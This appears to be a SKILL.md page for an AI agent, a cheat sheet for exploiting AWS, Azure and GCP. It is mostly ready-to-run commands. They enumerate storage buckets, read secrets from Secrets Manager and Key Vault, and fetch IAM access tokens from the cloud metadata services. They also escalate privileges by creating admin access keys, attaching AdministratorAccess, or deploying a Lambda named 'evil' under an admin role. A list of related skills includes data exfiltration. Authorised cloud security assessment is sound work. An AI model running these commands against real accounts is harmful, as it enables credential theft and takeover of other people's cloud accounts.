exploiting-cloud-platforms
Installation
SKILL.md
Exploiting Cloud Platforms
When to Use
- AWS, Azure, or GCP security assessment
- Cloud misconfiguration exploitation
- S3/Blob/Storage bucket hunting
- Cloud IAM privilege escalation
- Serverless function exploitation
- Cloud metadata service abuse
AWS Security
AWS CLI Setup
# Configure credentials
aws configure
# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1
# Test credentials
aws sts get-caller-identity
# List available regions
aws ec2 describe-regions
S3 Bucket Enumeration
# List buckets
aws s3 ls
# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive
# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/
# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/
S3 Bucket Discovery:
# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets
# Tools
# s3scanner
python3 s3scanner.py buckets.txt
# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt
IAM Enumeration
# Current user info
aws sts get-caller-identity
# List IAM users (if allowed)
aws iam list-users
# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username
# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1
# List roles
aws iam list-roles
# List groups
aws iam list-groups
EC2 Enumeration
# List instances
aws ec2 describe-instances
# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
# List security groups
aws ec2 describe-security-groups
# List key pairs
aws ec2 describe-key-pairs
# List snapshots
aws ec2 describe-snapshots --owner-ids self
# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all
Lambda Functions
# List functions
aws lambda list-functions
# Get function code
aws lambda get-function --function-name function-name
# Invoke function
aws lambda invoke --function-name function-name output.txt
# Get function configuration
aws lambda get-function-configuration --function-name function-name
RDS Enumeration
# List DB instances
aws rds describe-db-instances
# List DB snapshots
aws rds describe-db-snapshots
# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'
Secrets Manager
# List secrets
aws secretsmanager list-secrets
# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name
CloudTrail (Logging)
# Check if CloudTrail is enabled
aws cloudtrail describe-trails
# Check trail status
aws cloudtrail get-trail-status --name trail-name
# Get recent events
aws cloudtrail lookup-events
AWS Privilege Escalation
Common Misconfigurations:
# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships
Exploitation Examples:
# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user
# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt
Azure Security
Azure CLI Setup
# Login
az login
# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID
# Get current account
az account show
# List subscriptions
az account list
Blob Storage Enumeration
# List storage accounts
az storage account list
# List containers
az storage container list --account-name accountname
# List blobs
az storage blob list --container-name containername --account-name accountname
# Download blob
az storage blob download --container-name containername --name filename --account-name accountname
# Check public access
az storage container show --name containername --account-name accountname
# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file
Blob Discovery:
# Common patterns
companyname
companyname-backup
companyname-data
companyname-files
# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company
VM Enumeration
# List VMs
az vm list
# List VM images
az vm image list
# Get VM details
az vm show --resource-group RG --name VMname
# List NICs
az network nic list
# List public IPs
az network public-ip list
Azure AD Enumeration
# List users
az ad user list
# Get current user
az ad signed-in-user show
# List groups
az ad group list
# List service principals
az ad sp list
# List applications
az ad app list
Function Apps
# List function apps
az functionapp list
# Get function app details
az functionapp show --name functionappname --resource-group RG
# List functions
az functionapp function list --name functionappname --resource-group RG
# Download function code
az functionapp deployment source config-zip --name functionappname --resource-group RG
Key Vault
# List key vaults
az keyvault list
# List secrets
az keyvault secret list --vault-name vaultname
# Get secret
az keyvault secret show --name secretname --vault-name vaultname
Azure Metadata Service
# From Azure VM
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Get access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
GCP Security
gcloud Setup
# Login
gcloud auth login
# Login with service account
gcloud auth activate-service-account --key-file=key.json
# Get current account
gcloud config list
# List projects
gcloud projects list
Storage Bucket Enumeration
# List buckets
gsutil ls
# List bucket contents
gsutil ls gs://bucket-name/
# Download files
gsutil cp gs://bucket-name/file.txt ./
# Check bucket permissions
gsutil iam get gs://bucket-name/
# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt
Bucket Discovery:
# Common patterns
company-backup
company-data
company_backup
company_data
# GCPBucketBrute
python3 gcpbucketbrute.py -k company
Compute Engine
# List instances
gcloud compute instances list
# Get instance details
gcloud compute instances describe instance-name --zone=zone
# List disks
gcloud compute disks list
# List snapshots
gcloud compute snapshots list
# List firewall rules
gcloud compute firewall-rules list
IAM Enumeration
# List service accounts
gcloud iam service-accounts list
# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID
# List roles
gcloud iam roles list
# Describe role
gcloud iam roles describe roles/editor
Cloud Functions
# List functions
gcloud functions list
# Describe function
gcloud functions describe function-name --region=region
# Download source code (if accessible)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"
GCP Metadata Service
# From GCP VM
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"
# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"
Cloud Exploitation Tools
AWS:
# Pacu - AWS exploitation framework
python3 pacu.py
# ScoutSuite - Security auditing
python3 scout.py aws
# Prowler - Security assessment
./prowler -M csv
# WeirdAAL - AWS attack library
python3 weirdAAL.py
Azure:
# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains
# ScoutSuite
python3 scout.py azure
# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui
GCP:
# ScoutSuite
python3 scout.py gcp
# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths
Quick Cloud Wins
AWS:
- Public S3 buckets with sensitive data
- Overly permissive IAM policies
- Unencrypted snapshots
- Public RDS instances
- Lambda functions with secrets in environment variables
- EC2 metadata service abuse (SSRF)
Azure:
- Public blob storage containers
- Overly permissive RBAC
- Exposed Key Vault secrets
- Public-facing VMs with weak credentials
- Function apps with hardcoded secrets
GCP:
- Public storage buckets
- Overly permissive IAM bindings
- Public compute instances
- Service account key exposure
- Cloud Functions with secrets in code
Common Cloud Misconfigurations
- Public Storage - S3/Blob/GCS buckets with public read/write
- Excessive Permissions - Overly permissive IAM/RBAC policies
- Exposed Secrets - Keys/passwords in code, environment variables
- No MFA - Critical accounts without multi-factor authentication
- Open Security Groups - 0.0.0.0/0 access on sensitive ports
- Unencrypted Data - Storage/databases without encryption
- Default Credentials - Services using default passwords
- Exposed Metadata - SSRF to cloud metadata services
- Public Snapshots - EBS/disk snapshots publicly accessible
- CloudTrail Disabled - No logging of API calls
References
Related skills
More from trilwu/secskills
attacking-wireless-networks
Attack WiFi networks using WPA/WPA2 cracking, WPS exploitation, Evil Twin attacks, deauthentication, and wireless reconnaissance. Use when pentesting wireless networks or performing WiFi security assessments.
18testing-web-applications
Test web applications for security vulnerabilities including SQLi, XSS, command injection, JWT attacks, SSRF, file uploads, XXE, and API flaws. Use when pentesting web apps, analyzing authentication, or exploiting OWASP Top 10 vulnerabilities.
17cracking-passwords
Crack password hashes using hashcat/john, perform password spraying, brute force authentication, and execute pass-the-hash attacks. Use when cracking credentials or performing password-based attacks.
17testing-apis
Test REST and GraphQL APIs for authentication bypasses, authorization flaws, IDOR, mass assignment, injection attacks, and rate limiting issues. Use when pentesting APIs or testing microservices security.
16performing-reconnaissance
Perform OSINT, subdomain enumeration, port scanning, web reconnaissance, email harvesting, and cloud asset discovery for initial access. Use when gathering intelligence or mapping attack surface.
16transferring-files
Transfer files between systems using HTTP, SMB, FTP, netcat, base64 encoding, and living-off-the-land techniques for both Linux and Windows. Use when moving tools or exfiltrating data.
14